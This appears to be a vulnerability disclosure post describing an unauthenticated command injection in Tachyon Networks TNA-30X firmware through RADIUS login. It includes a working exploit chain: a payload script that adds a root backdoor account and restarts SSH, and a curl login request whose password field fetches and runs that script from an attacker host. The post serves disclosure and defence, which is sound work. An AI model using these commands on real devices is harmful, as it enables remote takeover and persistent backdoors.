Tachyon-Networks - Unauthenticated RCE

Published on 5 min read

Overview

During the authentication process, if the device has RADIUS authentication enabled it is possible to perform a command injection due to incomplete sanitisation of user input within the RADIUS logic.

Using this vulnerability an unauthenticated user can execute any payload on the device.

Note: If this is performed on a subscriber module, it may be possible to repeat the attack against the access point as the impacted firmware exposes the access point via the bridge interface.

Impacted Firmwares

This has been tested on TNA-30X firmware 1.12.0 (beta 1) which introduces the RADIUS authentication system, older firmwares are not vulnerable.

This vulnerability only impacts configurations with RADIUS user authentication enabled.

Exploit Steps

  1. Prepare the desired payload in a file on the attack box, simply create the below payload.sh file payload.sh 
    echo 'support:$1$6Hzch.yD$ULugJ982Yb1D0g8zhqv3T.:0:0:level=0,first_login=false:/:/bin/ash' >> /etc/passwd; rm /etc/dropbear/dropbear_*; dropbear -R
  2. Start web server on the attack box (python3 -m http.server 80)
  3. Send the first stage (curl http://ATTACKIP/payload.sh | ash) to /cgi.lua/login http endpoint 
    curl -k -v 'https://TARGETIP/cgi.lua/login' -X POST -H 'Content-Type: application/json' --data-raw '{"username":"root","password":"$(curl http://ATTACKIP/payload.sh | ash)"}'
  4. The example payload.sh will have inserted a backdoor account called support with the password admin, and started a SSH server allowing for access using SSH with the credentials.
> ssh [email protected]
Warning: Permanently added '192.168.1.1' (ECDSA) to the list of known hosts.
[email protected]'s password: 


BusyBox v1.31.1 () built-in shell (ash)


___ ____ ____ _  _ _   _ ____ _  _    _  _ ____ ___ _ _ _ ____ ____ _  _ ____ ®
 |  |__| |    |__|  \_/  |  | |\ |    |\ | |___  |  | | | |  | |__/ |_/  [__  
 |  |  | |___ |  |   |   |__| | \|    | \| |___  |  |_|_| |__| |  \ | \_ ___]

Tachyon Networks® (c) 2020-2024
https://tachyon-networks.com

1.12.0 rev 54500
root@tachyon-ptmp:~#

Vulnerable Code

Below is a sample of the code that is responsible for the vulnerability, whilst some sanitisation is performed it does not cover all possible command injections.

authentication.lua

-- Need to clear out backslashes first, then replace " and $ chars with escaped versions
local function sh_ss_clean(str)
        return str:gsub("\\", "\\\\"):gsub("\"", "\\\""):gsub("[$]", "\\$")  
end

local function sh_param_clean(str)
        return str:gsub("\\", "\\\\"):gsub("'", "\\'"):gsub("\"", "\\\"")
end

local function radius_auth(address, name, pass, rad_params)
        local res = {
                success = false,
                method = "radius",
                timeout = false
        }
        
        local cmd = string.format(
                'printf %%s "User-Name=\'%s\',User-Password=\'%s\'" | ' ..
                 ' /usr/bin/radclient -F -r 1 %s:%d auth "%s" 2>&1',
                sh_param_clean(name), 
                sh_param_clean(pass), 
                sh_ss_clean(rad_params.auth_server1 or ""), 
                tonumber(rad_params.auth_port) or 1812, 
                sh_ss_clean(rad_params.auth_secret or ""))
        local results = sysio.read_pipe(cmd)

Outcomes

After submitting the disclosure report to Tachyon-Networks the vulnerability was patched and new firmware released.

No CVE IDs have been assigned as of this post.

Affected Products:

Tachyon-Network TNA and TNS series devices

Mitigation:

Update impacted devices to Version 1.11.5 or later.

research   cve   security   tachyon-networks   disclosure